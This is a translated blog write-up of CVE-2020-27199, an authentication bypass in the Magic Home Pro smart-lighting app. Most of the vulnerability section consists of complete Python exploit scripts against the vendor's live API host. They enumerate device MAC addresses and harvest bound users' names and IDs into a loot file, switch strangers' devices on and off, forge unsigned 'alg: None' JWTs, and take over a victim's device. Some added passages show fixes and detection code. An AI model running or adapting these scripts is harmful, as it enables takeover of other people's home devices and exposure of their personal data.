
Example analysis of the Magic Home Pro authentication bypass vulnerability CVE-2020-27199

發(fā)布時(shí)間:2021-12-28 11:52:04 來源:億速云 閱讀:211 作者:小新 欄目:安全技術(shù)

This article walks through the Magic Home Pro authentication bypass vulnerability CVE-2020-27199 with a worked example. The analysis is detailed and should be a useful reference; it is worth reading to the end.

Prerequisites

A rooted Android phone;

Re-signing the JAR and rebuilding the APK;

Bypassing certificate pinning with Frida;

Vulnerability summary

Affected application: Magic Home Pro

Vendor: JadeHomic

WiFi controller vendor: Suzhou SmartChip Semiconductor Co.,Ltd

Vendor website: JadeHomic

Affected product code: Magic Home Pro

Vulnerability description

The vulnerability allows any authenticated user, at their current authorization level, to query endpoints that have nothing to do with their own registered products by calling the /app/getBindedUserListByMacAddress/ZG001?macAddress=<mac address> API. The server's response reveals whether the target node exists and, if it does, returns the bound user's username, unique user identifier (userUniID) and binding identifier (bindedUniID). The only check performed is that the caller is logged in; ownership of the MAC address is never verified.

Having enumerated MAC addresses this way, the attacker can send commands to the remote node with a POST request to the /app/sendCommandBatch/ZG001 API, carrying nothing more than the attacker's own valid token, the newly enumerated MAC address and a compatible hex command such as 71230fa3 (ON) or 71240fa4 (OFF).
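As an added illustration (not code from the original write-up or from the vendor), the following Python models the two endpoints above, first with only the login check the write-up describes, then with the object-level authorization check that is missing: a MAC address may only be queried or commanded by a user who is bound to it. The in-memory binding table, the user records and the function names are assumptions for illustration; the hex commands are the ones quoted above.

```python
# Added example, not from the original write-up or the vendor's code.
# Models /app/getBindedUserListByMacAddress and /app/sendCommandBatch
# with and without an ownership check. All data below is constructed.


class Forbidden(Exception):
    """Raised when a caller tries to act on a MAC address they are not bound to."""


# Constructed binding table: which account is bound to which controller MAC.
BINDINGS = {
    "C82E475DCE01": {"userName": "alice@example.com", "userUniID": "u-1001", "bindedUniID": "b-5001"},
    "C82E475DCE02": {"userName": "bob@example.com", "userUniID": "u-1002", "bindedUniID": "b-5002"},
}

# Hex commands quoted in the write-up.
CMD_ON = "71230fa3"
CMD_OFF = "71240fa4"
VALID_COMMANDS = {CMD_ON, CMD_OFF}


def get_binded_user_list_vulnerable(requester, mac):
    """Vulnerable: checks only that the caller is logged in, not that the
    caller owns the MAC, so any authenticated user can enumerate bindings."""
    if requester is None:
        raise Forbidden("login required")
    binding = BINDINGS.get(mac.upper())
    return [binding] if binding else []


def send_command_batch_vulnerable(requester, items):
    """Vulnerable: forwards a known command to any MAC that exists."""
    if requester is None:
        raise Forbidden("login required")
    delivered = []
    for item in items:
        mac = item["macAddress"].upper()
        if mac in BINDINGS and item["hexData"] in VALID_COMMANDS:
            delivered.append(mac)
    return delivered


def _owns(requester, mac):
    """Ownership check: the requester's unique ID must be bound to this MAC."""
    binding = BINDINGS.get(mac.upper())
    return binding is not None and binding["userUniID"] == requester["userUniID"]


def get_binded_user_list_fixed(requester, mac):
    """Fixed: return the binding only to a user bound to that MAC. 'Not found'
    and 'not yours' get the same empty answer, so existence cannot be probed."""
    if requester is None:
        raise Forbidden("login required")
    if not _owns(requester, mac):
        return []
    return [BINDINGS[mac.upper()]]


def send_command_batch_fixed(requester, items):
    """Fixed: refuse the whole batch if any target MAC is not owned by the caller."""
    if requester is None:
        raise Forbidden("login required")
    for item in items:
        if not _owns(requester, item["macAddress"]):
            raise Forbidden("not bound to %s" % item["macAddress"])
        if item["hexData"] not in VALID_COMMANDS:
            raise ValueError("unknown command %s" % item["hexData"])
    return [item["macAddress"].upper() for item in items]


if __name__ == "__main__":
    attacker = {"userName": "mallory@example.com", "userUniID": "u-1003"}
    print(get_binded_user_list_vulnerable(attacker, "C82E475DCE01"))  # leaks alice's binding
    print(get_binded_user_list_fixed(attacker, "C82E475DCE01"))       # []
```

The fixed lookup deliberately returns the same empty list for an unknown MAC and for someone else's MAC; a distinct "exists but not yours" error would still let an attacker sweep the address space for live controllers.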

JWT forgery

Once the initial enumeration is complete, the attacker can also forge a JWT from the userID and uniID that belong in the JWT payload, essentially by downgrading the token to the "None" algorithm in the JWT header (a signature-verification bypass). With that forged token the attacker makes a remote API call to /app/shareDevice/ZG001 and, via the friendUserID JSON parameter, adds the target device to their own device list, at which point they have full control of the target device.

Vulnerability types

Authentication bypass

Information disclosure

Unauthorized access

Horizontal privilege escalation

Attack vector

Requires an authenticated user

Successful enumeration of existing endpoint systems

Batch commands then sent to the remote node

Device takeover

Authentication bypass

Node enumeration and batch command PoC

Our PoC enumerates the last byte of a MAC address range and reports every address that has a bound user; if you want, you can then test the "remote execute" stage against one of the results.

import json
import os
import re

import requests
from colorama import Fore, Style, init

'''
First Stage  Authentication
Second Stage Enumerate
Third Stage  Remote Execute
'''

init()  # colorama: make the ANSI colour codes work on Windows consoles too

BASE_URL = "https://wifij01us.magichue.net"

found_macaddresses = []


def apiHeaders(token=None):
    # Headers as sent by the Magic Home Pro 1.5.1 Android client; the JWT
    # returned by /app/login/ZG001 travels in the custom "token" header.
    headers = {
        "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json",
        "Content-Type": "application/json; charset=utf-8",
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }
    if token is not None:
        headers["token"] = token
    return headers


def sendCommand(target, token, hexData, label):
    # Third stage: batch command to a node the caller does not own. The server
    # only checks that the token is valid, not that the MAC is bound to the user.
    url = BASE_URL + "/app/sendCommandBatch/ZG001"
    array = {
        "dataCommandItems": [
            {"hexData": hexData, "macAddress": target}
        ]
    }
    print(Fore.WHITE + "[+] Sending Payload ...")
    response = requests.post(url, data=json.dumps(array), headers=apiHeaders(token))
    if response.status_code == 200:
        if "true" in response.text:
            print(Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + f" Switched {label}")
        else:
            print(Fore.RED + f"[-] Failed to switch {label.lower()} Endpoint " + Style.RESET_ALL + f"{target}")


def turnOn(target, token):
    sendCommand(target, token, "71230fa3", "On")


def turnOff(target, token):
    sendCommand(target, token, "71240fa4", "Off")


def lighItUp(target, token):
    outtahere = ""
    q = "q"
    if len(str(target)) < 12:
        print(Fore.RED + "[!] Invalid target" + Style.RESET_ALL)
    elif re.fullmatch('[0-9a-f]{12}', target.lower()):
        while outtahere.lower() != q.lower():
            if outtahere == "0":
                turnOn(target, token)
            elif outtahere == "1":
                turnOff(target, token)
            outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)


def Main():
    urlAuth = BASE_URL + "/app/login/ZG001"

    data = {
        "userID": "<Valid Registered Email/Username>",
        "password": "<Valid Registered Password>",
        "clientID": ""
    }

    # First Stage Authenticate

    os.system('clear')
    print(Fore.WHITE + "[+] Authenticating ...")
    response = requests.post(urlAuth, json=data, headers=apiHeaders())
    resJsonAuth = response.json()
    token = resJsonAuth['token']

    # Second Stage Enumerate

    print(Fore.WHITE + "[+] Enumerating ...")
    macbase = "C82E475DCE"
    # Walk the whole last byte of the MAC address (00..FF)
    macaddress = [macbase + "%02X" % x for x in range(256)]

    urlEnum = BASE_URL + "/app/getBindedUserListByMacAddress/ZG001"
    with open('loot.txt', 'w') as f:
        for mac in macaddress:
            params = {"macAddress": mac}
            response = requests.get(urlEnum, params=params, headers=apiHeaders(token))
            resJsonEnum = response.json()
            data = resJsonEnum['data']
            if not data:
                # Empty list: no account is bound to this MAC
                continue
            found_macaddresses.append(mac)
            hit = (f"MAC Address Identified: {mac}, User: {data[0]['userName']}, "
                   f"Unique ID: {data[0]['userUniID']}, Binded ID: {data[0]['bindedUniID']}")
            print(Fore.GREEN + "[*] " + Style.RESET_ALL + hit)
            f.write("[*] " + hit + "\n")  # plain text, no colour codes in the loot file

        if not found_macaddresses:
            print(Fore.RED + "[-] No MAC addresses retrieved")
        else:
            attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)
            if attackboolean.upper() == 'Y':
                target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)
                lighItUp(target, token)
            elif attackboolean.upper() == 'N':
                print(Fore.CYAN + "Sometimes, belief isn't about what we can see. It's about what we can't." + Style.RESET_ALL)
            else:
                print(Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)


if __name__ == "__main__":
    Main()

Enumeration results

(Screenshot of the PoC's enumeration output; the image is not reproduced here.)
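The enumeration run above leaves a footprint on the server side that is easy to alert on: one token querying /app/getBindedUserListByMacAddress/ZG001 for many MAC addresses that differ only in the last byte, inside a short window, whereas a legitimate client only looks up the one or two MACs bound to its account. The following added example (not part of the original write-up) runs that detection over constructed access-log lines; the log layout, the field names and the thresholds are assumptions.

```python
# Added example, not from the original write-up: detection of the MAC
# enumeration pattern over constructed access-log lines. The log layout
# "<ISO timestamp> <token id> "<request line>" <status>" is an assumption.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<token>\S+) '
    r'"GET /app/getBindedUserListByMacAddress/ZG001\?macAddress=(?P<mac>[0-9A-Fa-f]{12})" '
    r'(?P<status>\d{3})$'
)

# Constructed sample log: one token walks C82E475DCE00..0B in twelve seconds
# (the PoC's pattern); two benign users only touch their own devices.
ATTACKER_LINES = [
    f'2020-07-06T12:00:{i:02d} tok-attacker '
    f'"GET /app/getBindedUserListByMacAddress/ZG001?macAddress=C82E475DCE{i:02X}" 200'
    for i in range(12)
]
BENIGN_LINES = [
    '2020-07-06T12:00:05 tok-alice "GET /app/getBindedUserListByMacAddress/ZG001?macAddress=C82E475DCE01" 200',
    '2020-07-06T12:00:40 tok-alice "GET /app/getBindedUserListByMacAddress/ZG001?macAddress=C82E475DCE01" 200',
    '2020-07-06T12:01:10 tok-alice "GET /app/getBindedUserListByMacAddress/ZG001?macAddress=C82E475DCE01" 200',
    '2020-07-06T12:00:07 tok-bob "GET /app/getBindedUserListByMacAddress/ZG001?macAddress=A1B2C3D4E5F6" 200',
    '2020-07-06T12:00:08 tok-bob "GET /app/getBindedUserListByMacAddress/ZG001?macAddress=9988776655AA" 200',
    '2020-07-06T12:00:09 tok-bob "POST /app/login/ZG001" 200',  # unrelated request, skipped by the parser
]
SAMPLE_LOG = ATTACKER_LINES + BENIGN_LINES


def parse_enum_requests(lines):
    """Return (timestamp, token, mac) for every MAC-lookup request, sorted by time;
    lines that are not MAC lookups are ignored."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["token"], m["mac"].upper()))
    return sorted(events)


def detect_enumeration(lines, window=timedelta(seconds=60), min_distinct=8, min_same_prefix=4):
    """Per token, slide a time window over its lookups and record the largest
    number of distinct MACs seen and the largest group sharing the first five
    bytes (differing only in the last byte). Either threshold exceeded is an alert."""
    by_token = defaultdict(list)
    for ts, token, mac in parse_enum_requests(lines):
        by_token[token].append((ts, mac))

    alerts = []
    for token, hits in by_token.items():
        best_distinct = best_prefix = 0
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1
            macs = {mac for _, mac in hits[start:end + 1]}
            groups = defaultdict(set)
            for mac in macs:
                groups[mac[:10]].add(mac[10:])
            best_distinct = max(best_distinct, len(macs))
            best_prefix = max(best_prefix, max(len(g) for g in groups.values()))
        if best_distinct >= min_distinct or best_prefix >= min_same_prefix:
            alerts.append({"token": token, "distinct_macs": best_distinct, "same_prefix_macs": best_prefix})
    return alerts


if __name__ == "__main__":
    for alert in detect_enumeration(SAMPLE_LOG):
        print(alert)
```

The same-prefix rule is the sharper of the two: four lookups against addresses sharing a five-byte prefix is already the PoC's signature, while the distinct-count rule catches a scan that hops across vendor prefixes.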

Token forgery PoC

Using the userID and uniqID returned by a successful enumeration, the attacker can run this token forgery PoC to generate an unsigned "alg: None" token that the server accepts in place of a signed JWT.

#!/usr/local/bin/python3

import base64
import os
import sys
from datetime import datetime
from time import mktime
from wsgiref.handlers import format_date_time

now = datetime.now()
stamp = mktime(now.timetuple())

r'''
Genuine login response that the forged one below imitates:

HTTP/1.1 200
Server: nginx/1.10.3
Content-Type: application/json;charset=UTF-8
Connection: close

"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"
'''


def b64url(text):
    # JWT segments are base64url without padding
    return base64.urlsafe_b64encode(text.encode()).rstrip(b"=").decode()


def Usage():
    print(f"Usage: {sys.argv[0]} <username> <unique id>")


def Main(user, uniqid):
    os.system('clear')
    print("[+] Encoding ...")
    print("[+] Bypass header created!")
    print("HTTP/1.1 200")
    print("Server: nginx/1.10.3")
    print("Date: " + str(format_date_time(stamp)))
    print("Content-Type: application/json;charset=UTF-8")
    print("Connection: close\r\n\r\n")

    # "alg": "None" announces an unsigned token: header.payload followed by an
    # empty signature segment. A verifier that honours the header accepts it as-is.
    jwt_header = '{"typ": "JsonWebToken","alg": "None"}'
    jwt_data = ('{"userID": "' + user + '", "uniID": "' + uniqid + '","cdpid": "ZG001","clientID": "",'
                '"serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,'
                '"loginDate": 1602712850608}')
    jwtcombined = b64url(jwt_header.strip()) + "." + b64url(jwt_data.strip()) + "."
    # Replacement body for the login response: code 0 (success), the victim's
    # identity fields and the forged token.
    print("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl://192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"" + user + "\",\"userEmail\":\"" + user + "\",\"userUniID\":\"" + uniqid + "\"},\"token\":\"" + jwtcombined + "\"}")


if __name__ == "__main__":
    if len(sys.argv) < 3:
        Usage()
    else:
        Main(sys.argv[1], sys.argv[2])
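The following is an added example (not code from the original write-up or from the vendor) covering the "alg: None" downgrade described in the JWT forgery section and the token the PoC above emits: what a permissive verifier does with it, and the verifier that rejects it, which is also what would stop the device-takeover call below from being accepted. The claim names follow the PoC; the HS256 secret, the algorithm allow-list and the function names are assumptions, since the write-up does not say which algorithm the genuine server token uses.

```python
# Added example, not from the original write-up or the vendor's code.
# Shows the "alg: None" token the PoC builds, a verifier that trusts the
# header (vulnerable) and a verifier that pins the algorithm (fixed).
# The HS256 key and the allow-list are assumptions for illustration.
import base64
import hashlib
import hmac
import json


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, key: bytes) -> str:
    """A legitimately issued token: header.payload.signature with HS256."""
    header = _b64url(json.dumps({"typ": "JWT", "alg": "HS256"}).encode())
    payload = _b64url(json.dumps(claims).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def forge_none_token(claims: dict) -> str:
    """What the token-forgery PoC builds: header says alg None, empty signature."""
    header = _b64url(json.dumps({"typ": "JsonWebToken", "alg": "None"}).encode())
    payload = _b64url(json.dumps(claims).encode())
    return f"{header}.{payload}."


def verify_trusting_header(token: str, key: bytes) -> dict:
    """Vulnerable verifier: lets the token choose its own algorithm. With
    alg none it returns the claims without checking anything at all."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg", "").lower() == "none":
        return json.loads(_b64url_decode(payload_b64))
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(payload_b64))


def verify_pinned(token: str, key: bytes, allowed=("HS256",)) -> dict:
    """Fixed verifier: the server decides the algorithm. Anything outside the
    allow-list (every spelling of 'none' included) or carrying an empty
    signature is rejected before the payload is trusted."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        raise ValueError("malformed or unsigned token")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") not in allowed:
        raise ValueError(f"algorithm {header.get('alg')!r} not allowed")
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(payload_b64))


if __name__ == "__main__":
    key = b"server-side-secret (assumed)"
    victim = {"userID": "victim@example.com", "uniID": "u-1001", "cdpid": "ZG001"}
    forged = forge_none_token(victim)
    print("permissive verifier accepts:", verify_trusting_header(forged, key)["userID"])
    try:
        verify_pinned(forged, key)
    except ValueError as err:
        print("pinned verifier rejects:", err)
```

Note that the fixed verifier checks the signature segment and the algorithm before it looks at a single claim; the order matters, because any code path that reads userID or uniID from an unverified payload recreates the bug.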

Device takeover PoC

The attacker exploits the vulnerability with their own email (a registered account that will receive the target's device), the target user's email (the account being taken over), the target device's MAC address (associated with the target email) and the forged token, to take over the target device.

#!/usr/local/bin/python3

import json
import os
import sys

import requests
from colorama import Fore, Style, init

init()


def Usage():
    print(f"Usage: {sys.argv[0]} <attacker email> <target email> <target mac address> <target forged token>")


def Main():
    attacker_email = sys.argv[1]
    target_email = sys.argv[2]  # the victim account that the forged token impersonates
    target_mac = sys.argv[3]
    forged_token = sys.argv[4]

    os.system('clear')
    print(Fore.WHITE + "[+] Sending Payload ...")
    url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"

    # Sent "as the victim": the forged token names the victim's userID/uniID,
    # while friendUserID is the attacker's own registered account.
    array = {"friendUserID": attacker_email, "macAddress": target_mac}
    data = json.dumps(array)

    headers = {
        "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json",
        "Content-Type": "application/json; charset=utf-8",
        "token": forged_token,
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }

    response = requests.post(url, data=data, headers=headers)
    if response.status_code == 200:
        if "true" in response.text:
            print(Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)
        else:
            print(Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)


if __name__ == "__main__":
    if len(sys.argv) < 5:
        Usage()
    else:
        Main()

Sample successful POST request/response exchange

POST Request

POST /app/shareDevice/ZG001 HTTP/1.1
User-Agent: Magic Home/1.5.1(ANDROID,9,en-US)
Accept-Language: en-US
Accept: application/json
token: <forged token, representing the target victim>
Content-Type: application/json; charset=utf-8
Content-Length: 72
Host: wifij01us.magichue.net
Connection: close
Accept-Encoding: gzip, deflate

{"friendUserID":"<attackercontrolled email>","macAddress":"<victim mac address>"}

Response

HTTP/1.1 200
Server: nginx/1.10.3
Date: Tue, 07 Jul 2020 05:31:33 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 31

{"code":0,"msg":"","data":true}

Authentication bypass (Magic Home Pro) (CVE-2020-27199)

Combining the JSON token forgery with the information gathered by the enumeration above (the target user's email, ClientID and UniqID), the attacker can bypass the mobile application's authentication by tampering with the HTTP login response, and so gain unauthorized access to the application as the target user.

First, the attacker attempts to log in to the Magic Home Pro app with the target user's email address, an arbitrary password and an arbitrary clientID. The server rejects this with a "Password error" response.

The attacker then replaces that response, using the details gleaned from the enumeration, with a successful login response that carries the forged token; the app accepts it and the authentication bypass is complete.

Original HTTP Login Request via Magic Home Pro Mobile app

POST /app/login/ZG001 HTTP/1.1
User-Agent: Magic Home/1.5.1(ANDROID,9,en-US)
Accept-Language: en-US
Accept: application/json
token:
Content-Type: application/json; charset=utf-8
Content-Length: 117
Host: wifij01us.magichue.net
Connection: close
Accept-Encoding: gzip, deflate

{"userID":"<victim userID>","password":"<arbitrary password>","clientID":"<arbitrary ClientID>"}

Original HTTP Response

HTTP/1.1 200
Server: nginx/1.10.3
Date: Thu, 08 Oct 2020 00:08:45 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 37

{"code":10033,"msg":"Password error"}

Edited HTTP Response

HTTP/1.1 200
Server: nginx/1.10.3
Date: Mon, 06 Jul 2020 12:32:02 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 907

{"code":0,"msg":"","data":{"webApi":"wifij01us.magichue.net/app","webPathOta":"http://wifij01us.magichue.net/app/ota/download","tcpServerController":"TCP,8816,ra8816us02.magichue.net","tcpServerBulb":"TCP,8815,ra8815us02.magichue.net","tcpServerControllerOld":"TCP,8806,mhc8806us.magichue.net","tcpServerBulbOld":"TCP,8805,mhb8805us.magichue.net","sslMqttServer":"ssl://192.168.0.112:1883","serverName":"Global","serverCode":"US","userName":"<victim userID>","userEmail":"<victim email>","userUniID":"<uniID gleaned from enumeration>"},"token":"<forged JWT based on gleaned data from API call>"}
